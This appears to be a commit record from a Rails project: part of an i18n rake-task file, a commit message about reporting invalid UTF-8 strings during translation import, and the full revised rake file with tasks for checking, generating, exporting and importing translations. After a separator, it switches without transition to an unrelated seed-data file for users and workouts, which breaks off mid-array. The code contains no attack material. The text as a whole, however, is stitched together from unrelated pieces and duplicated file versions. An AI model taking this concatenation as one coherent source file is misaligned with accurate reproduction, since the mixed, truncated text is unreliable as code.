files = (Dir.glob('./*') - ['./vendor'] + ['./vendor/plugins'] - ['./guard', './tmp']).map { |d| Dir.glob("#{d}/**/*rb") }.flatten.
reject{ |file| file =~ %r{\A\./(rb-fsevent|vendor/plugins/rails_xss|db|spec)/} }
files &= only if only
file_count = files.size
rb_extractor = I18nExtraction::RubyExtractor.new(:translations => @translations)
process_files(files) do |file|
source = File.read(file)
# ERB is compiled to Ruby so the same sexp-based extractor can process it.
source = Erubis::Eruby.new(source).src if file =~ /\.erb\z/
sexps = RubyParser.new.parse(source)
rb_extractor.scope = infer_scope(file)
rb_extractor.in_html_view = (file =~ /\.(html|facebook)\.erb\z/)
rb_extractor.process(sexps)
end
# JavaScript
files = (Dir.glob('./public/javascripts/**/*.js') + Dir.glob('./app/views/**/*.erb')).
reject{ |file| file =~ /\A\.\/public\/javascripts\/(i18nObj.js|i18n.js|jst\/|translations\/|compiled\/handlebars_helpers.js|tinymce\/jscripts\/tiny_mce(.*\/langs|\/tiny_mce\w*\.js))/ }
files &= only if only
js_extractor = I18nExtraction::JsExtractor.new(:translations => @translations)
process_files(files) do |file|
t2 = Time.now
ret = js_extractor.process(File.read(file), :erb => (file =~ /\.erb\z/), :filename => file)
file_count += 1 if ret
# flag pathologically slow files so they can be investigated
puts "#{file} #{Time.now - t2}" if Time.now - t2 > 1
ret
end
# Handlebars
files = Dir.glob('./app/views/jst/**/*.handlebars')
files &= only if only
handlebars_extractor = I18nExtraction::HandlebarsExtractor.new(:translations => @translations)
process_files(files) do |file|
file_count += 1 if handlebars_extractor.process(File.read(file), infer_scope(file))
end
# rspec-style summary: numbered failures, then counts; raises on failure so
# the rake invocation exits non-zero.
print "\n\n"
failure = @errors.size > 0
@errors.each_index do |i|
puts "#{i+1})"
puts red @errors[i]
print "\n"
end
print "Finished in #{Time.now - t} seconds\n\n"
total_strings = rb_extractor.total_unique + js_extractor.total_unique + handlebars_extractor.total_unique
puts send((failure ? :red : :green), "#{file_count} files, #{total_strings} strings, #{@errors.size} failures")
raise "check command encountered errors" if failure
end
desc "Generates a new en.yml file for all translations"
# Runs i18n:check first (which populates @translations), then dumps the
# canonical English strings to config/locales/generated/en.yml.
task :generate => :check do
yaml_dir = './config/locales/generated'
FileUtils.mkdir_p(File.join(yaml_dir))
yaml_file = File.join(yaml_dir, "en.yml")
# NOTE(review): RAILS_ROOT is the pre-Rails-3 constant — confirm it is still
# defined here (other tasks in this file use Rails.root).
File.open(File.join(RAILS_ROOT, yaml_file), "w") do |file|
file.write({'en' => @translations}.ya2yaml(:syck_compatible => true))
end
print "Wrote new #{yaml_file}\n\n"
end
desc "Generates JS bundle i18n files (non-en) and adds them to assets.yml"
task :generate_js do
# Loaded by hand (no :environment dependency) to keep the task lightweight.
require 'bundler'
Bundler.setup
require 'action_controller'
require 'i18n'
require 'sexp_processor'
require 'jammit'
require 'lib/i18n_extraction/js_extractor.rb'
I18n.load_path += Dir[Rails.root.join('config', 'locales', '**', '*.{rb,yml}')] +
Dir[Rails.root.join('vendor', 'plugins', '*', 'config', 'locales', '**', '*.{rb,yml}')]
Hash.send :include, HashExtensions
file_translations = {}
locales = I18n.available_locales - [:en]
# allow passing of extra, empty locales by including a comma-separated
# list of abbreviations in the LOCALES environment variable. e.g.
#
# LOCALES=hi,ja,pt,zh-hans rake i18n:generate_js
locales = locales + ENV['LOCALES'].split(',') if ENV['LOCALES']
all_translations = I18n.backend.send(:translations)
flat_translations = all_translations.flatten_keys
if locales.empty?
puts "Nothing to do, there are no non-en translations"
exit 0
end
# For each source file, collect the non-en translations of every key the
# extractor finds, grouped under the extractor's scope.
process_files = lambda do |extractor, files, arg_block|
files.each do |file|
begin
extractor.translations = {}
extractor.process(File.read(file), *arg_block.call(file)) or next
translations = extractor.translations.flatten_keys.keys
next if translations.empty?
file_translations[extractor.scope] ||= {}
locales.each do |locale|
file_translations[extractor.scope].update flat_translations.slice(*translations.map{ |k| k.gsub(/\A/, "#{locale}.") })
end
rescue
raise "Error reading #{file}: #{$!}\nYou should probably run `rake i18n:check' first"
end
end
end
# JavaScript
files = Dir.glob('./public/javascripts/**/*.js').
reject{ |file| file =~ /\A\.\/public\/javascripts\/(i18nObj.js|i18n.js|jst\/|translations\/|compiled\/handlebars_helpers.js|tinymce\/jscripts\/tiny_mce(.*\/langs|\/tiny_mce\w*\.js))/ }
js_extractor = I18nExtraction::JsExtractor.new
process_files.call(js_extractor, files, lambda{ |file| [{:filename => file}] } )
# Handlebars
files = Dir.glob('./app/views/jst/**/*.handlebars')
handlebars_extractor = I18nExtraction::HandlebarsExtractor.new
process_files.call(handlebars_extractor, files, lambda{ |file| [infer_scope(file)] } )
# Write one AMD module per scope; the write is skipped when content is
# unchanged so asset timestamps stay stable.
dump_translations = lambda do |translation_name, translations|
file = "public/javascripts/translations/#{translation_name}.js"
locales.each { |locale| translations[locale.to_s] ||= {} }
content = <<-TRANSLATIONS
// this file was auto-generated by rake i18n:generate_js.
// you probably shouldn't edit it directly
define(['i18nObj', 'jquery'], function(I18n, $) {
$.extend(true, I18n, {translations: #{translations.to_ordered.to_json}});
});
TRANSLATIONS
if !File.exist?(file) || File.read(file) != content
File.open(file, "w"){ |f| f.write content }
end
end
file_translations.each do |scope, translations|
dump_translations.call(scope, translations.expand_keys)
end
# in addition to getting the non-en stuff into each scope_file, we need to get the core
# formats and stuff for all languages (en included) into the common scope_file
core_translations = I18n.available_locales.inject({}) { |h1, locale|
h1[locale.to_s] = all_translations[locale].slice(:date, :time, :number, :datetime, :support)
h1
}
dump_translations.call('_core_en', {'en' => core_translations.delete('en')})
dump_translations.call('_core', core_translations)
end
desc "Exports new/changed English strings to be translated"
# Interactive task: diffs the freshly generated en.yml against a previous
# export (git commit or yml file), writes the new/changed strings to ./en.yml
# and optionally commits/pushes the regenerated base file for review.
task :export => :environment do
Hash.send :include, HashExtensions
begin
base_filename = "config/locales/generated/en.yml"
export_filename = 'en.yml'
current_branch = nil
# Remember the current git state so the ensure block can restore it.
prevgit = {}
prevgit[:branch] = `git branch | grep '\*'`.sub(/^\* /, '').strip
prevgit.delete(:branch) if prevgit[:branch].blank? || prevgit[:branch] == 'master'
unless `git status -s | grep -v '^\?\?' | wc -l`.strip == '0'
`git stash`
prevgit[:stashed] = true
end
# Prompt until we have a usable baseline (none / commit hash / yml path).
last_export = nil
begin
puts "Enter path or hash of previous export base (omit to export all):"
arg = $stdin.gets.strip
if arg.blank?
last_export = {:type => :none}
elsif arg =~ /\A[a-f0-9]{7,}\z/
puts "Fetching previous export..."
ret = `git show --name-only --oneline #{arg}`
if $?.exitstatus == 0
if ret.include?(base_filename)
`git checkout #{arg}`
if previous = YAML.safe_load(File.read(base_filename)).flatten_keys rescue nil
last_export = {:type => :commit, :data => previous}
else
$stderr.puts "Unable to load en.yml file"
end
else
$stderr.puts "Commit contains no en.yml file"
end
else
$stderr.puts "Invalid commit hash"
end
`git status -s | grep -v '^\?\?' | wc -l`
else
puts "Loading previous export..."
if File.exist?(arg)
if previous = YAML.safe_load(File.read(arg)).flatten_keys rescue nil
last_export = {:type => :file, :data => previous}
else
$stderr.puts "Unable to load yml file"
end
else
$stderr.puts "Invalid path"
end
end
end until last_export
begin
puts "Enter local branch containing current en translations (default master):"
current_branch = $stdin.gets.strip
end until current_branch.blank? || current_branch !~ /[^a-z0-9_\.\-]/
current_branch = nil if current_branch.blank?
puts "Extracting current en translations..."
`git checkout #{current_branch || 'master'}` if last_export[:type] == :commit || current_branch != prevgit[:branch]
Rake::Task["i18n:generate"].invoke
puts "Exporting #{last_export[:data] ? "new/changed" : "all"} en translations..."
current_strings = YAML.safe_load(File.read(base_filename)).flatten_keys
# With a baseline, keep only strings added or changed since it.
new_strings = last_export[:data] ?
current_strings.inject({}){ |h, (k, v)|
h[k] = v unless last_export[:data][k] == v
h
} :
current_strings
File.open(export_filename, "w"){ |f| f.write new_strings.expand_keys.ya2yaml(:syck_compatible => true) }
push = 'n'
begin
puts "Commit and push current translations? (Y/N)"
push = $stdin.gets.strip.downcase[0, 1]
end until ["y", "n"].include?(push)
if push == 'y'
`git add #{base_filename}`
if `git status -s | grep -v '^\?\?' | wc -l`.strip == '0'
puts "Exported en.yml, current translations unmodified (check git log for last change)"
else
`git commit -a -m"generated en.yml for translation"`
remote_branch = `git remote-ref`.strip.sub(%r{\Aremotes/[^/]+/(.*)\z}, '\\1')
local = current_branch || 'master'
# Push to the branch's configured remote under refs/for/<branch> (gerrit-style review).
`remote=$(git config branch."#{local}".remote); \
remote_ref=$(git config branch."#{local}".merge); \
remote_name=${remote_ref##refs/heads/}; \
git push $remote HEAD:refs/for/$remote_name`
puts "Exported en.yml, committed/pushed current translations (#{`git log --oneline|head -n 1`.sub(/ .*/m, '')})"
end
else
puts "Exported en.yml, dumped current translations (not committed)"
end
ensure
# Restore the pre-task branch and any stashed work.
`git checkout #{prevgit[:branch] || 'master'}` if prevgit[:branch] != current_branch
`git stash pop` if prevgit[:stashed]
end
end
desc "Validates and imports new translations"
# Interactive task: validates a translated YAML file against the original
# en.yml (missing/unexpected keys, interpolation-placeholder mismatches,
# markdown/wrapper mismatches) and, if accepted, merges it into
# config/locales/<language>.yml.
task :import => :environment do
require 'ya2yaml'
Hash.send :include, HashExtensions
# Sorted list of interpolation placeholders (%{name} / %h{name}) in str.
def placeholders(str)
str.scan(/%h?\{[^\}]+\}/).sort
rescue ArgumentError => e
# String#scan raises ArgumentError on invalid UTF-8 byte sequences; without
# this report, the import fails with no hint about which string is at fault.
puts "Unable to scan string: #{str.inspect}"
raise e
end
# String#scan that identifies the offending string when it contains an
# invalid UTF-8 byte sequence, instead of failing with no context.
def scan_and_report(str, re)
str.scan(re)
rescue ArgumentError => e
puts "Unable to scan string: #{str.inspect}"
raise e
end
# Fingerprint of the markdown constructs and wrapper tokens in str, used to
# check that a translation preserves the original's formatting.
def markdown_and_wrappers(str)
# some stuff this doesn't check (though we don't use):
# blockquotes, e.g. "> some text"
# reference links, e.g. "[an example][id]"
# indented code
(
scan_and_report(str, /\\[\\`\*_\{\}\[\]\(\)#\+\-\.!]/) +
scan_and_report(str, /(\*+|_+|`+)[^\s].*?[^\s]?\1/).map{|m|"#{m}-wrap"} +
scan_and_report(str, /(!?\[)[^\]]+\]\(([^\)"']+).*?\)/).map{|m|"link:#{m.last}"} +
scan_and_report(str, /^((\s*\*\s*){3,}|(\s*-\s*){3,}|(\s*_\s*){3,})$/).map{"hr"} +
scan_and_report(str, /^[^=\-\n]+\n^(=+|-+)$/).map{|m|m.first[0]=='=' ? 'h1' : 'h2'} +
scan_and_report(str, /^(\#{1,6})\s+[^#]*#*$/).map{|m|"h#{m.first.size}"} +
scan_and_report(str, /^ {0,3}(\d+\.|\*|\+|\-)\s/).map{|m|m.first =~ /\d/ ? "1." : "*"}
).sort
end
begin
puts "Enter path to original en.yml file:"
arg = $stdin.gets.strip
source_translations = File.exist?(arg) && YAML.safe_load(File.read(arg)) rescue nil
end until source_translations
raise "Source does not have any English strings" unless source_translations.keys.include?('en')
source_translations = source_translations['en'].flatten_keys
begin
puts "Enter path to translated file:"
arg = $stdin.gets.strip
new_translations = File.exist?(arg) && YAML.safe_load(File.read(arg)) rescue nil
end until new_translations
raise "Translation file contains multiple languages" if new_translations.size > 1
language = new_translations.keys.first
raise "Translation file appears to have only English strings" if language == 'en'
new_translations = new_translations[language].flatten_keys
# Interactive prompt per class of validation problem; returns false when the
# user chooses to quit.
item_warning = lambda { |error_items, description|
begin
puts "Warning: #{error_items.size} #{description}. What would you like to do?"
puts " [C] continue anyway"
puts " [V] view #{description}"
puts " [D] debug"
puts " [Q] quit"
command = $stdin.gets.upcase.strip
return false if command == 'Q'
debugger if command == 'D'
puts error_items.join("\n") if command == 'V'
end while command != 'C'
true
}
missing_keys = source_translations.keys - new_translations.keys
next unless item_warning.call(missing_keys.sort, "missing translations") if missing_keys.present?
unexpected_keys = new_translations.keys - source_translations.keys
next unless item_warning.call(unexpected_keys.sort, "unexpected translations") if unexpected_keys.present?
placeholder_mismatches = {}
markdown_mismatches = {}
new_translations.keys.each do |key|
p1 = placeholders(source_translations[key].to_s)
p2 = placeholders(new_translations[key].to_s)
placeholder_mismatches[key] = [p1, p2] if p1 != p2
m1 = markdown_and_wrappers(source_translations[key].to_s)
m2 = markdown_and_wrappers(new_translations[key].to_s)
markdown_mismatches[key] = [m1, m2] if m1 != m2
end
if placeholder_mismatches.size > 0
next unless item_warning.call(placeholder_mismatches.map{|k,(p1,p2)| "#{k}: expected #{p1.inspect}, got #{p2.inspect}"}.sort, "placeholder mismatches")
end
if markdown_mismatches.size > 0
next unless item_warning.call(markdown_mismatches.map{|k,(p1,p2)| "#{k}: expected #{p1.inspect}, got #{p2.inspect}"}.sort, "markdown/wrapper mismatches")
end
I18n.available_locales
# Merge onto any existing translations for the language so a partial import
# doesn't drop previously imported strings.
new_translations = (I18n.backend.send(:translations)[language.to_sym] || {}).flatten_keys.merge(new_translations)
File.open("config/locales/#{language}.yml", "w") { |f|
f.write({language => new_translations.expand_keys}.ya2yaml(:syck_compatible => true))
}
end
end
show bad UTF-8 strings on translation files
translation files (such as our recent fr.yml) can have \xNN character
strings in them. If they are invalid UTF-8 byte sequences, the
translation import (rake i18n:import) will fail without any hints
as to what the problematic string is. This fixes it.
Test Plan:
- run rake i18n:import on a translation file that has \x81 in it
and you should get a message identifying the offending string
Change-Id: I412efd1511f80d0e7e5519766a49a25dfa1639b0
Reviewed-on: https://gerrit.instructure.com/17909
Tested-by: Jenkins <d95b56ce41a2e1ac4cecdd398defd7414407cc08@instructure.com>
Reviewed-by: Brian Palmer <3cb4e1df5ec4da2c7c4af7c52cec8cf340a55a10@instructure.com>
QA-Review: Brian Palmer <3cb4e1df5ec4da2c7c4af7c52cec8cf340a55a10@instructure.com>
namespace :i18n do
# Mixed into Hash (Hash.send :include, HashExtensions) to convert between
# nested hashes and flat dot-separated key maps, and to sort recursively.
module HashExtensions
# {'a' => {'b' => 1}} becomes {'a.b' => 1}.
def flatten_keys(result={}, prefix='')
each_pair do |key, value|
if value.is_a?(Hash)
value.flatten_keys(result, "#{prefix}#{key}.")
else
result["#{prefix}#{key}"] = value
end
end
result
end
# {'a.b' => 1} becomes {'a' => {'b' => 1}}.
def expand_keys(result = {})
each_pair do |key, value|
segments = key.split('.')
leaf = segments.pop
node = segments.inject(result) { |hash, segment| hash[segment] ||= {} }
node[leaf] = value
end
result
end
# Recursively order keys (string sort) into an ActiveSupport::OrderedHash
# for stable serialisation output.
def to_ordered
keys.sort_by(&:to_s).inject ActiveSupport::OrderedHash.new do |ordered, key|
value = fetch(key)
ordered[key] = value.is_a?(Hash) ? value.to_ordered : value
ordered
end
end
end
# Derive the default I18n scope ("dot.separated.path") from a source file's
# path; returns '' when no scope applies.
def infer_scope(filename)
if filename =~ /app\/views\/.*\.handlebars\z/
filename.gsub(/.*app\/views\/jst\/_?|\.handlebars\z/, '').underscore.gsub(/\/_?/, '.')
elsif filename =~ /app\/controllers\//
scope = filename.gsub(/.*app\/controllers\/|controller.rb/, '').gsub(/\/_?|_\z/, '.')
# the base controller maps to the root scope
scope == 'application.' ? '' : scope
elsif filename =~ /app\/messages\//
filename.gsub(/.*app\/|erb/, '').gsub(/\/_?/, '.')
elsif filename =~ /app\/models\//
scope = filename.gsub(/.*app\/models\/|rb/, '')
# STI superclasses share the root scope rather than getting their own
STI_SUPERCLASSES.include?(scope) ? '' : scope
elsif filename =~ /app\/views\//
filename.gsub(/.*app\/views\/|(html\.|fbml\.)?erb\z/, '').gsub(/\/_?/, '.')
else
''
end
end
desc "Verifies all translation calls"
task :check => :environment do
Bundler.require :i18n_tools
only = if ENV['ONLY']
ENV['ONLY'].split(',').map{ |path|
path = '**/' + path if path =~ /\*/
path = './' + path unless path =~ /\A.?\//
if path =~ /\*/
path = Dir.glob(path)
elsif path !~ /\.(e?rb|js)\z/
path = Dir.glob(path + '/**/*')
end
path
}.flatten
end
STI_SUPERCLASSES = (`grep '^class.*<' ./app/models/*rb|grep -v '::'|sed 's~.*< ~~'|sort|uniq`.split("\n") - ['OpenStruct', 'Tableless']).
map{ |name| name.underscore + '.' }
COLOR_ENABLED = ($stdout.tty? rescue false)
def color(text, color_code)
COLOR_ENABLED ? "#{color_code}#{text}\e[0m" : text
end
def green(text)
color(text, "\e[32m")
end
def red(text)
color(text, "\e[31m")
end
@errors = []
def process_files(files)
files.each do |file|
begin
print green "." if yield file
rescue SyntaxError, StandardError
@errors << "#{$!}\n#{file}"
print red "F"
end
end
end
t = Time.now
I18n.available_locales
stringifier = proc { |hash, (key, value)|
hash[key.to_s] = value.is_a?(Hash) ?
value.inject({}, &stringifier) :
value
hash
}
@translations = I18n.backend.send(:translations)[:en].inject({}, &stringifier)
# Ruby
files = (Dir.glob('./*') - ['./vendor'] + ['./vendor/plugins'] - ['./guard', './tmp']).map { |d| Dir.glob("#{d}/**/*rb") }.flatten.
reject{ |file| file =~ %r{\A\./(rb-fsevent|vendor/plugins/rails_xss|db|spec)/} }
files &= only if only
file_count = files.size
rb_extractor = I18nExtraction::RubyExtractor.new(:translations => @translations)
process_files(files) do |file|
source = File.read(file)
source = Erubis::Eruby.new(source).src if file =~ /\.erb\z/
sexps = RubyParser.new.parse(source)
rb_extractor.scope = infer_scope(file)
rb_extractor.in_html_view = (file =~ /\.(html|facebook)\.erb\z/)
rb_extractor.process(sexps)
end
# JavaScript
files = (Dir.glob('./public/javascripts/**/*.js') + Dir.glob('./app/views/**/*.erb')).
reject{ |file| file =~ /\A\.\/public\/javascripts\/(i18nObj.js|i18n.js|jst\/|translations\/|compiled\/handlebars_helpers.js|tinymce\/jscripts\/tiny_mce(.*\/langs|\/tiny_mce\w*\.js))/ }
files &= only if only
js_extractor = I18nExtraction::JsExtractor.new(:translations => @translations)
process_files(files) do |file|
t2 = Time.now
ret = js_extractor.process(File.read(file), :erb => (file =~ /\.erb\z/), :filename => file)
file_count += 1 if ret
puts "#{file} #{Time.now - t2}" if Time.now - t2 > 1
ret
end
# Handlebars
files = Dir.glob('./app/views/jst/**/*.handlebars')
files &= only if only
handlebars_extractor = I18nExtraction::HandlebarsExtractor.new(:translations => @translations)
process_files(files) do |file|
file_count += 1 if handlebars_extractor.process(File.read(file), infer_scope(file))
end
print "\n\n"
failure = @errors.size > 0
@errors.each_index do |i|
puts "#{i+1})"
puts red @errors[i]
print "\n"
end
print "Finished in #{Time.now - t} seconds\n\n"
total_strings = rb_extractor.total_unique + js_extractor.total_unique + handlebars_extractor.total_unique
puts send((failure ? :red : :green), "#{file_count} files, #{total_strings} strings, #{@errors.size} failures")
raise "check command encountered errors" if failure
end
desc "Generates a new en.yml file for all translations"
# Runs i18n:check first (which populates @translations), then dumps the
# canonical English strings to config/locales/generated/en.yml.
task :generate => :check do
yaml_dir = './config/locales/generated'
FileUtils.mkdir_p(File.join(yaml_dir))
yaml_file = File.join(yaml_dir, "en.yml")
# NOTE(review): RAILS_ROOT is the pre-Rails-3 constant — confirm it is still
# defined here (other tasks in this file use Rails.root).
File.open(File.join(RAILS_ROOT, yaml_file), "w") do |file|
file.write({'en' => @translations}.ya2yaml(:syck_compatible => true))
end
print "Wrote new #{yaml_file}\n\n"
end
desc "Generates JS bundle i18n files (non-en) and adds them to assets.yml"
task :generate_js do
require 'bundler'
Bundler.setup
require 'action_controller'
require 'i18n'
require 'sexp_processor'
require 'jammit'
require 'lib/i18n_extraction/js_extractor.rb'
I18n.load_path += Dir[Rails.root.join('config', 'locales', '**', '*.{rb,yml}')] +
Dir[Rails.root.join('vendor', 'plugins', '*', 'config', 'locales', '**', '*.{rb,yml}')]
Hash.send :include, HashExtensions
file_translations = {}
locales = I18n.available_locales - [:en]
# allow passing of extra, empty locales by including a comma-separated
# list of abbreviations in the LOCALES environment variable. e.g.
#
# LOCALES=hi,ja,pt,zh-hans rake i18n:generate_js
locales = locales + ENV['LOCALES'].split(',') if ENV['LOCALES']
all_translations = I18n.backend.send(:translations)
flat_translations = all_translations.flatten_keys
if locales.empty?
puts "Nothing to do, there are no non-en translations"
exit 0
end
process_files = lambda do |extractor, files, arg_block|
files.each do |file|
begin
extractor.translations = {}
extractor.process(File.read(file), *arg_block.call(file)) or next
translations = extractor.translations.flatten_keys.keys
next if translations.empty?
file_translations[extractor.scope] ||= {}
locales.each do |locale|
file_translations[extractor.scope].update flat_translations.slice(*translations.map{ |k| k.gsub(/\A/, "#{locale}.") })
end
rescue
raise "Error reading #{file}: #{$!}\nYou should probably run `rake i18n:check' first"
end
end
end
# JavaScript
files = Dir.glob('./public/javascripts/**/*.js').
reject{ |file| file =~ /\A\.\/public\/javascripts\/(i18nObj.js|i18n.js|jst\/|translations\/|compiled\/handlebars_helpers.js|tinymce\/jscripts\/tiny_mce(.*\/langs|\/tiny_mce\w*\.js))/ }
js_extractor = I18nExtraction::JsExtractor.new
process_files.call(js_extractor, files, lambda{ |file| [{:filename => file}] } )
# Handlebars
files = Dir.glob('./app/views/jst/**/*.handlebars')
handlebars_extractor = I18nExtraction::HandlebarsExtractor.new
process_files.call(handlebars_extractor, files, lambda{ |file| [infer_scope(file)] } )
dump_translations = lambda do |translation_name, translations|
file = "public/javascripts/translations/#{translation_name}.js"
locales.each { |locale| translations[locale.to_s] ||= {} }
content = <<-TRANSLATIONS
// this file was auto-generated by rake i18n:generate_js.
// you probably shouldn't edit it directly
define(['i18nObj', 'jquery'], function(I18n, $) {
$.extend(true, I18n, {translations: #{translations.to_ordered.to_json}});
});
TRANSLATIONS
if !File.exist?(file) || File.read(file) != content
File.open(file, "w"){ |f| f.write content }
end
end
file_translations.each do |scope, translations|
dump_translations.call(scope, translations.expand_keys)
end
# in addition to getting the non-en stuff into each scope_file, we need to get the core
# formats and stuff for all languages (en included) into the common scope_file
core_translations = I18n.available_locales.inject({}) { |h1, locale|
h1[locale.to_s] = all_translations[locale].slice(:date, :time, :number, :datetime, :support)
h1
}
dump_translations.call('_core_en', {'en' => core_translations.delete('en')})
dump_translations.call('_core', core_translations)
end
desc "Exports new/changed English strings to be translated"
task :export => :environment do
Hash.send :include, HashExtensions
begin
base_filename = "config/locales/generated/en.yml"
export_filename = 'en.yml'
current_branch = nil
prevgit = {}
prevgit[:branch] = `git branch | grep '\*'`.sub(/^\* /, '').strip
prevgit.delete(:branch) if prevgit[:branch].blank? || prevgit[:branch] == 'master'
unless `git status -s | grep -v '^\?\?' | wc -l`.strip == '0'
`git stash`
prevgit[:stashed] = true
end
last_export = nil
begin
puts "Enter path or hash of previous export base (omit to export all):"
arg = $stdin.gets.strip
if arg.blank?
last_export = {:type => :none}
elsif arg =~ /\A[a-f0-9]{7,}\z/
puts "Fetching previous export..."
ret = `git show --name-only --oneline #{arg}`
if $?.exitstatus == 0
if ret.include?(base_filename)
`git checkout #{arg}`
if previous = YAML.safe_load(File.read(base_filename)).flatten_keys rescue nil
last_export = {:type => :commit, :data => previous}
else
$stderr.puts "Unable to load en.yml file"
end
else
$stderr.puts "Commit contains no en.yml file"
end
else
$stderr.puts "Invalid commit hash"
end
`git status -s | grep -v '^\?\?' | wc -l`
else
puts "Loading previous export..."
if File.exist?(arg)
if previous = YAML.safe_load(File.read(arg)).flatten_keys rescue nil
last_export = {:type => :file, :data => previous}
else
$stderr.puts "Unable to load yml file"
end
else
$stderr.puts "Invalid path"
end
end
end until last_export
begin
puts "Enter local branch containing current en translations (default master):"
current_branch = $stdin.gets.strip
end until current_branch.blank? || current_branch !~ /[^a-z0-9_\.\-]/
current_branch = nil if current_branch.blank?
puts "Extracting current en translations..."
`git checkout #{current_branch || 'master'}` if last_export[:type] == :commit || current_branch != prevgit[:branch]
Rake::Task["i18n:generate"].invoke
puts "Exporting #{last_export[:data] ? "new/changed" : "all"} en translations..."
current_strings = YAML.safe_load(File.read(base_filename)).flatten_keys
new_strings = last_export[:data] ?
current_strings.inject({}){ |h, (k, v)|
h[k] = v unless last_export[:data][k] == v
h
} :
current_strings
File.open(export_filename, "w"){ |f| f.write new_strings.expand_keys.ya2yaml(:syck_compatible => true) }
push = 'n'
begin
puts "Commit and push current translations? (Y/N)"
push = $stdin.gets.strip.downcase[0, 1]
end until ["y", "n"].include?(push)
if push == 'y'
`git add #{base_filename}`
if `git status -s | grep -v '^\?\?' | wc -l`.strip == '0'
puts "Exported en.yml, current translations unmodified (check git log for last change)"
else
`git commit -a -m"generated en.yml for translation"`
remote_branch = `git remote-ref`.strip.sub(%r{\Aremotes/[^/]+/(.*)\z}, '\\1')
local = current_branch || 'master'
`remote=$(git config branch."#{local}".remote); \
remote_ref=$(git config branch."#{local}".merge); \
remote_name=${remote_ref##refs/heads/}; \
git push $remote HEAD:refs/for/$remote_name`
puts "Exported en.yml, committed/pushed current translations (#{`git log --oneline|head -n 1`.sub(/ .*/m, '')})"
end
else
puts "Exported en.yml, dumped current translations (not committed)"
end
ensure
`git checkout #{prevgit[:branch] || 'master'}` if prevgit[:branch] != current_branch
`git stash pop` if prevgit[:stashed]
end
end
desc "Validates and imports new translations"
task :import => :environment do
require 'ya2yaml'
Hash.send :include, HashExtensions
# Sorted list of interpolation placeholders (%{name} / %h{name}) in str.
# Names the offending string when scanning trips over invalid UTF-8
# (String#scan raises ArgumentError on such input).
def placeholders(str)
found = str.scan(/%h?\{[^\}]+\}/)
found.sort
rescue ArgumentError => error
puts "Unable to scan string: #{str.inspect}"
raise error
end
# String#scan that identifies the string being scanned when it contains an
# invalid UTF-8 byte sequence, instead of failing with no context.
def scan_and_report(str, re)
begin
str.scan(re)
rescue ArgumentError => error
puts "Unable to scan string: #{str.inspect}"
raise error
end
end
# Fingerprint of the markdown constructs and wrapper tokens in str, used to
# verify a translation preserves the original's formatting.
# Not checked (and not used by us): blockquotes ("> text"),
# reference links ("[an example][id]"), indented code.
def markdown_and_wrappers(str)
escapes = scan_and_report(str, /\\[\\`\*_\{\}\[\]\(\)#\+\-\.!]/)
wraps = scan_and_report(str, /(\*+|_+|`+)[^\s].*?[^\s]?\1/).map { |m| "#{m}-wrap" }
links = scan_and_report(str, /(!?\[)[^\]]+\]\(([^\)"']+).*?\)/).map { |m| "link:#{m.last}" }
rules = scan_and_report(str, /^((\s*\*\s*){3,}|(\s*-\s*){3,}|(\s*_\s*){3,})$/).map { "hr" }
setext = scan_and_report(str, /^[^=\-\n]+\n^(=+|-+)$/).map { |m| m.first[0]=='=' ? 'h1' : 'h2' }
atx = scan_and_report(str, /^(\#{1,6})\s+[^#]*#*$/).map { |m| "h#{m.first.size}" }
lists = scan_and_report(str, /^ {0,3}(\d+\.|\*|\+|\-)\s/).map { |m| m.first =~ /\d/ ? "1." : "*" }
(escapes + wraps + links + rules + setext + atx + lists).sort
end
begin
puts "Enter path to original en.yml file:"
arg = $stdin.gets.strip
source_translations = File.exist?(arg) && YAML.safe_load(File.read(arg)) rescue nil
end until source_translations
raise "Source does not have any English strings" unless source_translations.keys.include?('en')
source_translations = source_translations['en'].flatten_keys
begin
puts "Enter path to translated file:"
arg = $stdin.gets.strip
new_translations = File.exist?(arg) && YAML.safe_load(File.read(arg)) rescue nil
end until new_translations
raise "Translation file contains multiple languages" if new_translations.size > 1
language = new_translations.keys.first
raise "Translation file appears to have only English strings" if language == 'en'
new_translations = new_translations[language].flatten_keys
item_warning = lambda { |error_items, description|
begin
puts "Warning: #{error_items.size} #{description}. What would you like to do?"
puts " [C] continue anyway"
puts " [V] view #{description}"
puts " [D] debug"
puts " [Q] quit"
command = $stdin.gets.upcase.strip
return false if command == 'Q'
debugger if command == 'D'
puts error_items.join("\n") if command == 'V'
end while command != 'C'
true
}
missing_keys = source_translations.keys - new_translations.keys
next unless item_warning.call(missing_keys.sort, "missing translations") if missing_keys.present?
unexpected_keys = new_translations.keys - source_translations.keys
next unless item_warning.call(unexpected_keys.sort, "unexpected translations") if unexpected_keys.present?
placeholder_mismatches = {}
markdown_mismatches = {}
new_translations.keys.each do |key|
p1 = placeholders(source_translations[key].to_s)
p2 = placeholders(new_translations[key].to_s)
placeholder_mismatches[key] = [p1, p2] if p1 != p2
m1 = markdown_and_wrappers(source_translations[key].to_s)
m2 = markdown_and_wrappers(new_translations[key].to_s)
markdown_mismatches[key] = [m1, m2] if m1 != m2
end
if placeholder_mismatches.size > 0
next unless item_warning.call(placeholder_mismatches.map{|k,(p1,p2)| "#{k}: expected #{p1.inspect}, got #{p2.inspect}"}.sort, "placeholder mismatches")
end
if markdown_mismatches.size > 0
next unless item_warning.call(markdown_mismatches.map{|k,(p1,p2)| "#{k}: expected #{p1.inspect}, got #{p2.inspect}"}.sort, "markdown/wrapper mismatches")
end
I18n.available_locales
new_translations = (I18n.backend.send(:translations)[language.to_sym] || {}).flatten_keys.merge(new_translations)
File.open("config/locales/#{language}.yml", "w") { |f|
f.write({language => new_translations.expand_keys}.ya2yaml(:syck_compatible => true))
}
end
end
|
# Development seed data for users and workouts.
namespace :seed do
# Run every seeding task.
task all: ["users", "workouts"]
desc 'Seed Workouts'
# Placeholder: no workout fixtures are defined yet.
task :workouts => :environment do
workouts = {
}
end
desc 'Seed Users'
# Create a fixed roster of sample users spanning a range of longest
# distances and mile times.
# NOTE(review): units are not stated in code — distances look like miles and
# mile_time like milliseconds (540_000 ms = 9:00); confirm against the model.
task :users => :environment do
users = [
{ :name => "Jacob", :gender => "male", :longest_distance => 3.1, :mile_time => 540_000 },
{ :name => "Sophia", :gender => "female", :longest_distance => 3.1, :mile_time => 570_000 },
{ :name => "Mason", :gender => "male", :longest_distance => 5.2, :mile_time => 360_000 },
{ :name => "Emma", :gender => "female", :longest_distance => 5.2, :mile_time => 390_000 },
{ :name => "Ethan", :gender => "male", :longest_distance => 13.1, :mile_time => 430_000 },
